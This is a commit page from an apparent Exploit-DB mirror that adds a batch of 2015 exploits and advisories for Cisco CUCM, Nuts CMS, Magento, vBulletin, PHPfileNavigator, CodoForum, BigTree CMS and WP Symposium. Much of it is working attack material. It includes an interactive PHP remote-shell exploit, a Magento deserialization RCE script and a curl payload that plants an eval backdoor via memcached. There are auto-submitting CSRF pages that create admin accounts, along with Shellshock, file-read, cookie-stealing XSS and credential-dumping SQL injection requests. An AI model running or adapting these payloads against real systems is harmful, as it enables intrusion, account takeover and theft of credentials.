bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-19

Browse source 
16 new exploits
This commit is contained in:
Offensive Security 2015-08-19 05:01:48 +00:00
parent 4377b18056
commit 30734a6700
18 changed files with 2011 additions and 510 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1030
files.csv
View file

File diff suppressed because it is too large Load diff

6
platforms/linux/local/205.pl
View file

@ -50,6 +50,6 @@ unlink("geezer");
printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)\n" ;
exec '/tmp/shell' ;
# milw0rm.com [2000-11-29]
# milw0rm.com [2000-11-29]

106
platforms/multiple/webapps/37816.txt Executable file
View file

@ -0,0 +1,106 @@
Vantage Point Security Advisory 2015-001
========================================
Title: Cisco Unified Communications Manager Multiple Vulnerabilities
Vendor: Cisco
Vendor URL: http://www.cisco.com/
Versions affected: <9.2, <10.5.2, <11.0.1.
Severity: Low to medium
Vendor notified: Yes
Reported: Oct. 2014
Public release: Aug. 13th, 2015
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>
Summary:
--------
Cisco Unified Communications Manager (CUCM) offers services such as session
management, voice, video, messaging, mobility, and web conferencing.
During the last year, Vantage Point Security has reported four security
issues to Cisco as listed below.
1. Shellshock command injection
--------------------------------
Authenticated users of CUCM can access limited functionality via the web
interface and Cisco console (SSH on port 22). Because the SSH server is
configured to process several environment variables from the client and a
vulnerable version of bash is used, it is possible to exploit command
injection via specially crafted environment variables (CVE-2014-6271 a.k.a.
shellshock). This allows an attacker to spawn a shell running as the user
"admin".
Several environment variables can be used to exploit the issue. Example:
$ LC_PAPER="() { x;};/bin/sh" ssh Administrator@examplecucm.com
2. Local File Inclusion
-----------------------
The application allows users to view the contents of any locally accessible
files on the web server through a vulnerability known as LFI (Local File
Inclusion). LFI vulnerabilities are commonly used to download application
source code, configuration files and files containing sensitive information
such as passwords. Exploiting this issue requires a valid user account.
https://cucm.example.com/:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml
3. Unauthenticated access to ping command
-----------------------------------------
The pingExecute servlet allows unauthenticated users to execute pings to
arbitrary IP addresses. This could be used by an attacker to enumerate the
internal network. The following URL triggers a ping of the host 10.0.0.1:
https://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false
4. Magic session ID allows unauthenticated access to SOAP calls
---------------------------------------------------------------
Authentication for some methods in the EPAS SOAP interface can be bypassed
by using a hardcoded session ID. The methods "GetUserLoginInfoHandler" and
"GetLoggedinXMPPUserHandler" are affected.
Fix Information:
----------------
Upgrade to CUCM version 9.2, 10.5.2 or 11.0.1.
References:
-----------
https://tools.cisco.com/quickview/bug/CSCus88031
https://tools.cisco.com/quickview/bug/CSCur49414
https://tools.cisco.com/quickview/bug/CSCum05290
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
http://tools.cisco.com/security/center/viewAlert.x?alertId=37111
Timeline:
---------
2014/10: Issues reported to Cisco;
2015/07: Confirm that all issues have been fixed.
About Vantage Point Security:
--------------------
Vantage Point is the leading provider for penetration testing and security
advisory services in Singapore. Clients in the Financial, Banking and
Telecommunications industries select Vantage Point Security based on
technical competency and a proven track record to deliver significant and
measurable improvements in their security posture.
https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg

13
platforms/osx/local/37825.txt Executable file
View file

@ -0,0 +1,13 @@
Source: https://github.com/kpwn/tpwn
tpwn
cve-2015-???? poc ~ os x 10.10.5 kernel local privilege escalation
vulnerability got burned in 10.11
full writeup #eta#son
shout out @ unthreadedjb 4 hax
Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37825.zip

51
platforms/php/webapps/37809.php Executable file
View file

@ -0,0 +1,51 @@
<?php
# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit
#
# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.
# Nuts CMS is an open source solution that is freely available to everyone.
#
# Discovered by Yakir Wizman
# Date 17/08/2015
# Vendor Homepage : http://www.nuts-cms.com/
# CVE : N/A
# Description : Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).
###
# Exploit code:
error_reporting(E_ALL);
$error[0] = "[!] This script is intended to be launched from the cli.";
if(php_sapi_name() <> "cli")
die($error[0]);
if($argc < 3) {
echo("\nUsage : php {$argv[0]} <host> <path>");
echo("\nExample: php {$argv[0]} localhost /");
die();
}
if(isset($argv[1]) && isset($argv[2])) {
$host = $argv[1];
$path = $argv[2];
}
$pack = "GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Cmd: %s\r\n";
$pack.= "Connection: close\r\n\r\n";
while(1) {
print "\nAnonymous@{$host}:~# ";
if(($cmd = trim(fgets(STDIN))) == "exit")
break;
preg_match("/_nutCmsId_(.*)/s", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
function http_send($host, $pack) {
if(!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}\n");
fwrite($sock, $pack);
return stream_get_contents($sock);
}
?>

79
platforms/php/webapps/37811.py Executable file
View file

@ -0,0 +1,79 @@
#!/usr/bin/python
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
# Google Dork: "Powered by Magento"
# Date: 08/18/2015
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
# Vendor Homepage: http://magento.com/
# Software Link: https://www.magentocommerce.com/download
# Version: 1.9.0.1 and below
# Tested on: Ubuntu 15
# CVE : none
from hashlib import md5
import sys
import re
import base64
import mechanize
def usage():
print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
sys.exit()
if len(sys.argv) != 3:
usage()
# Command-line args
target = sys.argv[1]
arg = sys.argv[2]
# Config.
username = ''
password = ''
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Sat, 15 Nov 2014 20:27:57 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)
request = br.open(target)
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh
try:
request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
print e.read()

41
platforms/php/webapps/37815.txt Executable file
View file

@ -0,0 +1,41 @@
vBulletin's memcache setting is vulnerable in certain versions(all
before 4.2.2) to an RCE. vBulletin seem to have refused to classify it
as a vulnerability or post anything about it, or put anything in the
announcements on their website. They say "PL2 (4.2.2) should prevent the
use of localhost," however that doesn't help people using previous
versions(which they appear to support with patches, still.)
They also haven't updated previous versions of vBulletin for this bug,
despite it being reported that it works on versions prior to 4.2.2.
Of course though, the most important thing is, they haven't announced
there even is/was a vulnerability in any version.
Anyways, here it is:
Remote Upload allows to send arbitrary data to loopback-only services, possibly allowing the execution of arbitrary code Exists in vB4
The remote upload as implemented by the vB_Upload_* classes and vB_vURL (at least in vB 4.2.x, most probably earlier releases are also affected, and vB 5 might be affected as well) does not restrict the destination ports and hosts for remote uploads. This allows an attacker to abuse the function to as a proxy commit TCP port scans on other hosts. Much worse, it also allows to connect to local loopback-only services or to services only exposed on an internal network.
On a setup running e.g. Memcached in default configuration (bound to localhost:11211, no authentication), the latter can be exploited to execute arbitrary code by forging a request to memcached, updating the `pluginlist` value.
Proof-of-Concept using cURL:
$ curl 'http://sandbox.example.com/vb42/profile.php?do=updateprofilepic' -H 'Cookie: bb_userid=2; bb_password=926944640049f505370a38250f22ae57' --data 'do=updateprofilepic&securitytoken=1384776835-db8ce45ef28d8e2fcc1796b012f0c9ca1cf49e38&avatarurl=http://localhost:11211/%0D%0Aset%20pluginlist%200%200%2096%0D%0Aa%3A1%3A%7Bs%3A12%3A%22global_start%22%3Bs%3A62%3A%22if%28isset%28%24_REQUEST%5B%27eval%27%5D%29%29%7Beval%28%24_REQUEST%5B%27eval%27%5D%29%3Bdie%28%29%3B%7D%0D%0A%22%3B%7D%0D%0Aquit%0D%0A.png'
This leads to vBulletin opening a connection to the Memcached (localhost:11211) and sending the following data:
HEAD /
set pluginlist 0 0 96
a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}
";}
quit
.png HTTP/1.0
Host: localhost
User-Agent: vBulletin via PHP
Connection: close
This will cause the Memcached to update the `pluginlist` to contain the malicious code.
Furthermore, the remote upload happily follows all kinds of redirects if provided with an appropriate Location header.

147
platforms/php/webapps/37817.txt Executable file
View file

@ -0,0 +1,147 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt
Vendor:
================================
pfn.sourceforge.net
Product:
===================================
PHPfileNavigator v2.3.3 (pfn)
Is state-of-the-art, open source web based application
to complete manage your files and folders.
Vulnerability Type:
=========================
Persistent & Reflected XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form.
nome, usuario, email etc...
We can leverage existing CSRF vulnerability to update a victimz profile and
store malicious
XSS payload or an malicious user can inject there own payloads when
updating thier profilez
affecting other users and the security of the whole application.
Multiple reflected XSS exists as well for following PHP pages all with same
vulnerable
parameter 'dir' when issuing GET requests.
pfn-2.3.3 application seems to filter out <script> tags etc, but we can
bypass this using
<DIV onMouseMove= JS functions!.
navega.php
accion.php
preferencias.php
Tested using xampp-1.7.0
Exploit code(s):
===============
Persistent XSS:
---------------
POST URL:
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=
e.g.
Inject <script>alert(666)</script> into the 'Name*', 'User*' or 'Email'
field
and click Accept button.
Injecting XSS into 'name' field will store the XSS payload in the pfn MySQL
database
in 'pfn_usuarios' table called 'nome' in the 'nome' column. The Same fate
will happen for
other injected fields 'email & 'usuario'.
Reflected XSS:
--------------
1)
http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELL&dir=
" <DIV onMouseMove= "alert(document.cookie) " </a>
2)
http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscador&PHPSESSID=HELL&dir=
" <DIV onMouseMove= "alert(document.cookie) " </a>
3)
http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELL&dir=
" <DIV onMouseMove= "alert(document.cookie) " </a>
Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] POST / GET
Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)
Vulnerable Parameter(s): [+] nome, usuario, email, dir
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

157
platforms/php/webapps/37818.txt Executable file
View file

@ -0,0 +1,157 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812a.txt
Vendor:
================================
pfn.sourceforge.net
Product:
===================================
PHPfileNavigator v2.3.3 (pfn)
Is state-of-the-art, open source web based application
to complete manage your files and folders.
Vulnerability Type:
================================
CSRF add arbitrary user accounts
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF token exists when creating user accounts, this allows
us to exploit the application and add arbitrary users The
?PHPSESSID= cookie used in URL is useless as we can just replace
the value with whatever.
e.g.
?PHPSESSID='inthesignofevil'
or just omit it all together makes no difference exploit will
still succeed. Next create our form POST and a self calling
Javascript function, then get a logged in user to click our
malicious linx or visit our webpage where they will be PWN3D.
Tested using xampp-1.7.0
Exploit code(s):
===============
<!DOCTYPE>
<html>
<!-- CSRF exploit add arbitrary user accounts with Admin privs -->
<form id="USERIOS_EVILOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php?PHPSESSID=inthesignofevil"
method="post">
<input type="hidden" name="id_usuario" value="" />
<input type="text" id="nome" name="nome" value="hyp3rlinx" class="text"
tabindex="10" />
<input type="text" id="usuario" name="usuario" value="hyp3rlinx"
class="text" tabindex="20" />
<input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
<input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
<input type="text" id="email" name="email" value="hell@abysmalgod.com"
class="text" tabindex="50" />
<input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
<input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
<select id="cambiar_datos" name="cambiar_datos" tabindex="75">
<option value="1" >ON</option>
<option value="0" selected="selected">OFF</option>
</select>
<select id="id_grupo" name="id_grupo" tabindex="80">
<option value="0" selected="selected">Administrators</option>
</select>
<select id="admin" name="admin" tabindex="90">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<select id="estado" name="estado" tabindex="100">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
class="checkbox" />
</form>
<script>
(function PWN3D(){
var e=document.getElementById('USERIOS_EVILOS')
e.submit()
})()
</script>
</body>
</html>
Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)
Vulnerable Parameter(s): [+] id_usuario, id_grupo
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

150
platforms/php/webapps/37819.txt Executable file
View file

@ -0,0 +1,150 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812b.txt
Vendor:
=========================
pfn.sourceforge.net
Product:
=====================================================
PHPfileNavigator v2.3.3 (pfn)
Is state-of-the-art, open source web based application
to complete manage your files and folders.
Vulnerability Type:
=============================
Privilege Escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
We can elevate privileges from that of a regular user
to an Admin level. In order for the attack
to succeed and escalate privileges to become Admin you need
know your ID for the 'id_usuario' field when executing the
attack.
Tested using xampp-1.7.0
Exploit code(s):
===============
<!DOCTYPE>
<html>
<script>
function pwn(){
var e=document.getElementById('ELEVATO_DE_PRIVLOS')
e.submit()
}
</script>
<body onLoad="pwn()">
<!-- Escalate privs to that of Admin -->
<form id="ELEVATO_DE_PRIVLOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php"
method="post">
<input type="hidden" name="id_usuario" value="5" />
<input type="text" id="nome" name="nome" value="b2" class="text"
tabindex="10" />
<input type="text" id="usuario" name="usuario" value="b2" class="text"
tabindex="20" />
<input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
<input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
<input type="text" id="email" name="email" value="b@b.com" class="text"
tabindex="50" />
<input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
<input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
<select id="cambiar_datos" name="cambiar_datos" tabindex="75">
<option value="1" >ON</option>
<option value="0" selected="selected">OFF</option>
</select>
<select id="id_grupo" name="id_grupo" tabindex="80">
<option value="1" selected="selected">Administrators</option>
</select>
<select id="admin" name="admin" tabindex="90">
<option value="1" selected="selected">ON</option>
<option value="0">OFF</option>
</select>
<select id="estado" name="estado" tabindex="100">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
class="checkbox" />
</form>
</body>
</html>
Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)
Vulnerable Parameter(s): [+] id_grupo, admin, id_usuario
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

115
platforms/php/webapps/37820.txt Executable file
View file

@ -0,0 +1,115 @@
CodoForum 3.3.1: Multiple SQL Injection Vulnerabilities
Security Advisory Curesec Research Team
http://blog.curesec.com/article/blog/CodoForum-331-Multiple-SQL-Injection-Vulnerabilities-42.html
1. Introduction
Affected Product: CodoForum 3.3.1
Fixed in: 3.4
Fixed Version Link:
https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.3.4.build-19.zip
Vendor Contact: admin@codologic.com
Vulnerability Type: Multiple SQL injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
There are two SQL injections in the CodoForum application. One is a
blind injection which does not require any credentials, the other is a
normal SQL injection which does require that the attacker be authenticated.
These vulnerabilities can lead to data leaks as well as compromisation
of the host.
SQL Injection 1 (Blind)
The script that parses the request URL and displays posts depending on
the retrieved id does not use proper protection against SQL injections.
It does cast the retrieved user input to int, but it does not use this
value, but the original value instead.
The retrieved values are never displayed to the end user, making this a
blind injection. An attacker does not need to be authenticated to
perform this attack.
Proof of Concept:
http://localhost/codoforum/index.php?u=/page/6 and
1=1%23/terms-of-service
-> true (terms and services displayed)
http://localhost/codoforum/index.php?u=/page/6 and
1=2%23/terms-of-service
-> false ("You do not have enough permissions to view this page!")
Code:
routes.php:593
$pid = (int) $id;
$user = \CODOF\User\User::get();
$qry = 'SELECT title, content FROM ' . PREFIX . 'codo_pages p '
. ' LEFT JOIN ' . PREFIX . 'codo_page_roles r ON
r.pid=p.id '
. ' WHERE (r.rid IS NULL OR (r.rid IS NOT NULL AND
r.rid IN (' . implode($user->rids) . ')))'
. ' AND p.id=' . $id;
SQL Injection 2
The script processing the mass sending of email does not properly handle
the subject, body, or roles arguments it retrieves from a POST request.
The script can only be accessed by authenticated users.
The following request:
http://localhost/codoforum/admin/index.php?page=system/massmail
POST: subject=USER_SUPPLIED_subj&body=USER_SUPPLIED_body
for example results in this query:
INSERT INTO codo_mail_queue (to_address, mail_subject, body) SELECT
mail, 'USER_SUPPLIED_subj', 'USER_SUPPLIED_body' FROM codo_users AS u
Code:
admin/modules/system/massmail.php
$subject = html_entity_decode($_POST['subject'],
ENT_NOQUOTES, "UTF-8");
$body = html_entity_decode($_POST['body'], ENT_NOQUOTES,
"UTF-8");
[...]
if (isset($_POST['roles'])) {
$condition = " INNER JOIN " . PREFIX .
"codo_user_roles AS r ON r.uid=u.id "
. " WHERE r.rid IN (" .
implode($_POST['roles']) . ")";
}
$qry = "INSERT INTO " . PREFIX . "codo_mail_queue
(to_address, mail_subject, body)"
. " SELECT mail, '$subject', '$body' FROM " .
PREFIX . "codo_users AS u"
. $condition;
3. Solution
Upgrade to Version 3.4:
https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.3.4.build-19.zip
4. Report Timeline
07/07/2015 Informed Vendor about Issue
07/07/2015 Vendor confirmation
08/03/2015 Vendor releases Version 3.4
08/07/2015 Disclosed to public

158
platforms/php/webapps/37821.txt Executable file
View file

@ -0,0 +1,158 @@
BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory Curesec Research Team
Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html
1. Introduction
Affected Product: BigTree CMS 4.2.3
Fixed in: 4.2.4
Fixed Version Link:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Vendor Contact: contribute@bigtreecms.org
Vulnerability Type: Multiple SQL Injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
Various components of the admin area of the BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromisation
of the host.
Please note that you have to be authenticated to exploit this issue.
SQL Injection 1
The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.
Proof of Concept (Show all BigTree users):
http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0'
union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from
bigtree_users %23/
Code:
core/admin/modules/pages/view-tree.php:151; page id is user
controlled
$nav_visible =
array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
$nav_hidden =
array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
$nav_archived = $admin->getArchivedNavigationByParent($page["id"]);
core/inc/bigtree/admin.php:2638
static function getArchivedNavigationByParent($parent) {
[...]
$q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY
nav_title asc");
core/inc/bigtree/admin.php:3167
static function getHiddenNavigationByParent($parent) {
[...]
$q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived
!= 'on' ORDER BY nav_title asc");
core/inc/bigtree/admin.php:3758
static function getNaturalNavigationByParent($parent,$levels = 1) {
[...]
$q = sqlquery("SELECT id,nav_title AS
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND
archived != 'on' ORDER BY position DESC, id ASC");
core/inc/bigtree/admin.php:4531
static function getPendingNavigationByParent($parent,$in_nav = true) {
[...]
$q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE
pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type =
'NEW' ORDER BY date DESC");
SQL Injection 2
When creating a new user, the email address is not checked server side,
so it is possible to set it to anything.
When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.
Proof of Concept:
1. Create User
f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. result can be seen in multiple places
Code:
core/inc/bigtree/admin.php:81
$f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id =
'".$_SESSION["bigtree_admin"]["id"]."' AND email =
'".$_SESSION["bigtree_admin"]["email"]."'"));
SQL Injection 3 (Blind)
The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.
Proof of Concept:
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of
All Sizes
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of
All Sizes
Code:
core/admin/ajax/pages/get-seo-score.php:4:
$seo = $admin->getPageSEORating($_POST,$_POST["resources"]);
core/inc/bigtree/admin.php:4222
static function getPageSEORating($page,$content) {
[...]
if ($page["title"]) {
$score += 5;
// They have a title, let's see if it's unique
$r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE
title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));
3. Solution
To mitigate this issue please upgrade at least to version 4.2.3:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Please note that a newer version might already be available.
4. Report Timeline
07/07/2015 Informed Vendor about Issue
07/08/2015 Vendor send Fixes for confirmation
07/10/2015 Fixes Confirmed
07/26/2015 Vendor releases Version 4.2.3
08/07/2015 Disclosed to public

62
platforms/php/webapps/37822.txt Executable file
View file

@ -0,0 +1,62 @@
Details
================
Software: WP Symposium
Version: 15.1
Homepage: https://wordpress.org/plugins/wp-symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)
Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data
Vulnerability
================
An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.
Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wordpress/
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
Mitigations
================
Upgrade to version 15.8 or later
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published
Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.

64
platforms/php/webapps/37824.txt Executable file
View file

@ -0,0 +1,64 @@
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? <= version <= 15.5.1
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Apache / WordPress 4.2.3 / wp-symposium 15.5.1
# CVE:
# Category: remote
1. Product Description
Extract from the plugin page :
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."
2. Vulnerability Description & Technical Details
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter 'size'.
The issue is exploitable even if the plugin is deactivated.
3. Impact Analysis :
The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the Wordpress installation. Collected information may also allow further attacks.
